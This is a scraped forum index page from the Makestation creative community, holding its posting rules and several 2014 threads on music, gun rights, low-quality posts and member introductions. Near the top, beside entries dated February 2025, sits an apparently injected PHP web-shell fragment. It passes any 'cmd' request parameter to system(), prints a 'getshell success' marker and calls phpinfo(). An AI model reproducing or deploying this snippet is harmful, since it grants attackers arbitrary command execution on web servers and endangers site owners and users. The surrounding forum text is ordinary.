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February 19th, 2025
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February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
February 19th, 2025
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Forum Rules & Guidelines |
Posted by: Darth-Apple - July 18th, 2014 at 4:21 AM - Forum: Announcements
- Replies (1)
The Makestation Constitution:
Welcome to Makestation! We are a community aimed at making it possible for users to share any creative projects they have worked on, being in a community full of like minded souls! In order to keep all discussion civil, constructive, and free of uncontrolled chaos, we have a few guidelines that we have set. We ask all users to read these rules, as we will enforce them to improve the overall community. 
Basic, site-wide guidelines - All content must abide by a PG-13 rating. Any content that is racist, sexist, hateful, pornographic, illegal, slanderous, or insulting in any way is prohibited, and will be removed on first sight. This includes posting of pornography or links to such websites, attacking others for their political views, hate speech, etc.
- Some responsible use of mild language is allowed. Please refrain from excessive profanity in the interest of the PG-13 rating requirement on the forums. For mature discussions, see the "Downstairs" group.
- Posting illegal content, game cracks, etc. is strongly prohibited on our forums. This type of content is not encouraged here.
- You are allowed one account on the forums per person, unless expressively given permission by an administrator. Clone accounts will be subject to removal.
- Public forum drama and/or disrespect/harassment towards members is prohibited.
- You must be 13 years of age or over to register and participate on Makestation. Our moderators and admins are required to enforce this for legal reasons, according to the COPPA act in US law. We cannot make any exceptions to this rule, even if you do not live in the United States.
The inkeeper rule: Regarding spam and low quality content (named in honor of Simmania)- Double posting (posting multiple posts in a row without allowing other users to reply in between) is generally prohibited. However, if you are updating a thread or project that is your own, or if the posts are more than 24 hours apart, it is generally considered acceptable to double post with a good reason.
- Posting low quality posts and/or spam is prohibited. Actual examples of low quality content (that have been posted before) include:
- Plez help me sir master find the exit to forum
- Come pleese join my forum!!!
- u dont use xenforo u r bad admin !
- Hmm no respond.
- Other examples of low quality content include:
- Posting consistently with one or two word posts on the forums, or consistently posting in ALL CAPS (may be viewed as yelling on the forums)
- Posting advertisements that are low quality, links for the purpose of monetized affiliation, or otherwise posting content that is spambot-like.
- Posting consistently for no other intent than to advertise. (Advertisements are generally allowed, and we love to help support other communities. However, ordinary content guidelines are still enforced. See below for more information on advertisements on our forums. )
- Plagiarism is not allowed on our forums. If plagiarism is discovered, the post will be removed and the poster may be subject to a ban on the forums.
Advertising, signatures, and avatars
Makestation is a creative arts and discussion community. With that in mind, we generally do allow members to advertise their websites and their projects. Generally, advertising is acceptable as long as users are not posting spam-like content on the forums and are not advertising projects that don't line up with our rules. Acceptable ways to advertise include:
- Posting a thread in the advertisement section.
- Creating a small signature link or using a small promotional banner. Promotional banners are not allowed to extend beyond the width of 768 pixels or the height of 80 pixels. This is to prevent signatures from breaking the page or looking overly bulky on the forums. Overall, you may utilize your signature for advertising however you'd like, so long as your signature size is kept within reason. Multiple full sized banners, for example, is prohibited.
General avatar, signature, and advertisement rules include: - Don't use your avatar as an advertisement.
- You may advertise websites that aren't your own. However, don't claim another website as your own. This should be fairly self explanatory.
- Do not excessively bump advertisement threads on the forums. Generally, once a week is considered acceptable if useful/interesting information is presented with each bump. Bumping daily with basic statistics is considered spam.
- You must have a minimum of 30 posts on the forums before you are permitted to create a new thread in the Other Communities section.
- Do not use Makestation to drop links for SEO or for internet marketing related websites, or for any website that may be interpreted as delivering malicious content or to be part of a scam. Such content is almost always considered as spam and/or low quality content, and is not tolerated here. All website links must also generally be PG-13 (linking to pornographic websites, for example, is prohibited).
General forum etiquette. - Getting along well with members of the forum involves participating in discussions in a civil manner. This is a rule we enforce very strictly, as we do not tolerate drama and disrespectful behavior that might make others feel uncomfortable on our forums. Flaming, trolling, or otherwise demeaning any member here is strictly prohibited.
- Duplicate threads are allowed. Unlike some other forums, we are not strict about this. However, do search for discussions that are active before you create a topic to ensure that active duplicates aren't created on the forums. We may merge threads at our discretion.
- Philosophical, religious, and political debates are openly welcomed in the Philosophy & Debates and Current Events boards. In order to protect open and free discussion, we ask that all users be respectful of others opinions, even if they disagree. Remember that we are a worldwide community, and have members across a variety of backgrounds with a diverse set of political and/or religious views. Personal attacks are strictly prohibited, and threads that become uncivil will be locked and/or removed at first sight.
- Be constructive! We do not require that all feedback be strictly positive, but nonconstructive and demeaning behavior could offend members of our community, and is prohibited.
- Don't feed trolls. Trolls are users who intentionally rile up drama or try to upset others on the community, and they thrive off of provoking other users to engage non-constructively with them. Report these posts instead, the moderation team will take care of them promptly.
- We've tried to make these rules and guidelines relatively inclusive and informative. That said, finding loopholes and causing trouble won't be encouraged. If you are causing trouble and/or drama in the community, you will be considered to be breaking the forum rules by the staff.
Staff- Staff positions are not granted upon request. Such requests will be denied. If you are interested in becoming a staff member, active contributions on the forums, strict abidance to the rules, and a generally good attitude may make you look desirable when the administration is "hiring."

- All staff members here are volunteers, working hard to improve the community. With that said, failure to respect a staff member's decision will result in a ban or a warning from an administrator.
- Any decision made by a moderator or administrator in my absense is to be considered binding, as if it were made by myself. We, as a staff, operate as one team, and we do not make decisions without operating collectively on them. If a staff member takes administrative or moderator action, do not private message me asking for an override. I will deny it.
Besides that, good behavior in the forums is more or less common sense. Enjoy the makestation community!
[Updated December 2022]
-Site staff
Low quality content |
Posted by: Darth-Apple - July 17th, 2014 at 5:56 PM - Forum: Web Design & Internet
- Replies (11)
So, lately I've been browsing a few forums, and have been a bit annoyed by the amount of low quality content that is posted. I understand that of course every forum has members who post low quality content, but when every discussion turns into a "list X" topic full of three word responses and nobody bothers to even read the OP before replying, it defeats the point of having a discussion forum to begin with. I'm also equally annoyed participating on forums where the administrators care about nothing other than their own statistics or the software that they run. Some niches tend to be worse than others, but no real niche is immune these days.
Anyway, I just find it sad that so new forums around are trying so hard to survive that they focus on nothing other than the stats. Forums are a great thing when the discussions stay unique and interesting.
What are your thoughts? Have you found yourself participating on good forums in the past that have had growing issues with low quality content?
Tenor vs. Bass |
Posted by: Darth-Apple - July 16th, 2014 at 7:05 PM - Forum: Media & Entertainment
- Replies (3)
Lately it seems that pop music has been pushing more and more towards tenor domination territory as far as male singers are concerned. The majority of male artists today in the pop genre are tenors (or at least try to be), and those with lower voices are left for other genres more often than not. (Country, etc...)
I think it's interesting to see artists do something outside of the norm as far as that's concerned, but I must say, I much prefer the tenor side of things myself. What is your preference?
Second Ammendment |
Posted by: Darth-Apple - July 14th, 2014 at 3:25 PM - Forum: Current Events
- Replies (4)
I fully believe that the second amendment is a good thing and that it ought to be upheld, but if you are literally walking down the street in a public area with an open gun near a lot of families, you are going to cause some concern and should expect someone to question your behavior. Not only that, but when the police (who you ought to be working with to protect public safety) question you as to why you are carrying a large weapon in a family area, you're going to sound suspicious when your response is "I'm not answering any more of your questions" and "it's my right."
Don't get me wrong. I'm not necessarily arguing that open carry is a bad thing. There have been numerous studies that have shown that civilians can have a major effect reducing casualties during mass shootings, which shouldn't be surprising. My overall feeling is that banning guns would do nothing to prevent them from getting into the wrong hands, but would prevent them from getting into the hands of those who intend to protect the public. The police can't be everywhere at every time. However, that said, refusing to cooperate with the police when you are causing a genuine suspicion is asking for trouble and is flat out irresponsible towards the public in general.
Although this is no new debate, what is your overall opinion of guns and gun control today?
Lyrics stuck in your head |
Posted by: Mohawk - July 13th, 2014 at 9:37 PM - Forum: General Discussion
- Replies (2)
We've all heard catchy songs before, but do you have any song lyrics stuck in your head? Tell us!
Currently, I have the main lyric from Maroon 5's song "Maps" stuck in my head:
Quote:The map that leads to you
Ain't nothing I can do
The map that leads to you
Following, following, following to you
The map that leads to you
Ain't nothing I can do
The map that leads to you
Hey There |
Posted by: Mohawk - July 13th, 2014 at 9:35 PM - Forum: Introductions
- Replies (4)
Hi, I'm Mohawk (but I don't mind being called Shane or Russ, I'll explain later) and I am an 18 year old high school senior. I am the creator of Stenix OS, an upcoming Linux distribution that aims to please the end-user's needs while not including un-necessary clutter in the distro. Other than that, I like anime, web design and gaming too.
Anyways, I go by the names I said on top cause Shane is my real name but I sometimes go under the alias of Russell out of boredom and the need of change every now and then. I chose my nickname cause the mohawk is my favorite hairstyle and would like to get one sometime. School won't allow it under their dress code though. Anyways, I will be making a Skype soon so if you'd like to chat, feel free to PM me for it. Thank you!